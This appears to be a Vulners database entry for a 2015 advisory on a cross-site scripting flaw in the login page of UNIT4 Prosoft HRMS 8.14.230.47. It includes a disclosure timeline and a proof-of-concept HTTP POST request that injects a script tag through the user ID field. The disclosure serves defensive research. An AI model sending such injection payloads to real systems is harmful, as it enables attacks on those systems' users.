Vulners
Lucene search
UNIT4 Prosoft HRMS 8.14.230.47 Cross Site Scripting
`# Vulnerability type: Cross-site Scripting
# Vendor: http://www.unit4.com/
# Product: UNIT4 Prosoft HRMS
# Product site: http://www.unit4apac.com/products/prosofthrms
# Affected version: 8.14.230.47
# Fixed version: 8.14.330.43
# Credit: Jerold Hoong & Edric Teo
# PROOF OF CONCEPT
The login page of UNIT4's Prosoft HRMS is vulnerable to cross-site scripting.
POST /Login.aspx?ReturnUrl=%2fCommon%2fBroadcastMessageDisplay.aspx%3fUrlReferrerCode
%3d&UrlReferrerCode HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=teuq5d45e53ecg45mzptyv55
Host: 127.0.0.1
Content-Length: 1276
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-SG
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMjAyNzEwNDEyOQ9kFgQCAQ9
kFgICAQ8WAh4EVGV4dAVfPGxpbmsgcmVsPSJTSE9SVENVVCBJQ09OIiBocmVmPSJBcHBfVGhlbWVzL1BTRGV
mYXVsdC9JbWFnZXMvRmF2SWNvbi5pY28iIHR5cGU9ImltYWdlL3gtaWNvbiIgLz5kAgMPZBYKAgEPZBYCAgMP
DxYCHgdWaXNpYmxlaGRkAgMPZBYCZg8PFgIfAAU0VGhlIGNvZGUgY29udGFpbnMgaW52YWxpZCBjaGFyYWN
0ZXJzLiAoVVNSLlVzZXJDb2RlKWRkAgUPDxYCHwAFBlY4IFVBVGRkAgcPZBYWAgEPZBYEAgEPDxYCHwAFC0
NsaWVudCBDb2RlZGQCBQ8PFgIeDEVycm9yTWVzc2FnZQUIUmVxdWlyZWRkZAIDD2QWBAIBDw8WAh8ABQ
ZTZXJ2ZXJkZAIDDxBkZBYAZAIFD2QWBAIBDw8WAh8ABQhEYXRhYmFzZWRkAgUPDxYCHwIFCFJlcXVpcmV
kZGQCBw9kFgQCAQ8PFgIfAAULTERBUCBEb21haW5kZAIDDxBkZBYAZAIJDw8WAh8ABQdVc2VyIElEZGQCCw
8PZBYCHgxhdXRvY29tcGxldGUFA29mZmQCDQ8PFgIfAgUIUmVxdWlyZWRkZAIPDw8WAh8ABQhQYXNzd29yZ
GRkAhMPDxYCHwFoZBYEAgEPDxYCHwAFCExhbmd1YWdlZGQCAw8QZGQWAGQCFQ8PFgIfAAUVRm9yZ290I
HlvdXIgcGFzc3dvcmQ%2FZGQCFw8PFgYfAAUHU2lnbiBJbh4EXyFTQgKAAh4FV2lkdGgbAAAAAADAUkABAAAA
ZGQCCw9kFgJmD2QWBAIDDxYCHwAFQkNvcHlyaWdodCDCqSAyMDExIFVOSVQ0IEFzaWEgUGFjaWZpYyBQd
GUgTHRkLiBBbGwgUmlnaHRzIFJlc2VydmVkLmQCBQ8WAh8ABRNWZXJzaW9uIDguMTQuMzMwLjQzZGSwnj3
yxmGDZ9jR0wKr5HZldmVj4w%3D%3D&__EVENTVALIDATION=%2FwEWBQLctJOuBALT8dy8BQK1qbSRCwL
WxaLXDALD94uUBwZOBjPAY1F7DZ4L5a8tZ4BpX9CW&txtUserID=%22%3E%3Cscript%3Ealert%281%29%3B%3
C%2Fscript%3E&txtPassword=&btnSignIn=Sign+In
# TIMELINE
28/10/2014: Vulnerability found
04/11/2014: Vendor informed
04/11/2014: Vendor responded
30/11/2014: Vendor fixed the issue
14/02/2015: Public disclosure
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Feb 2015 00:00Current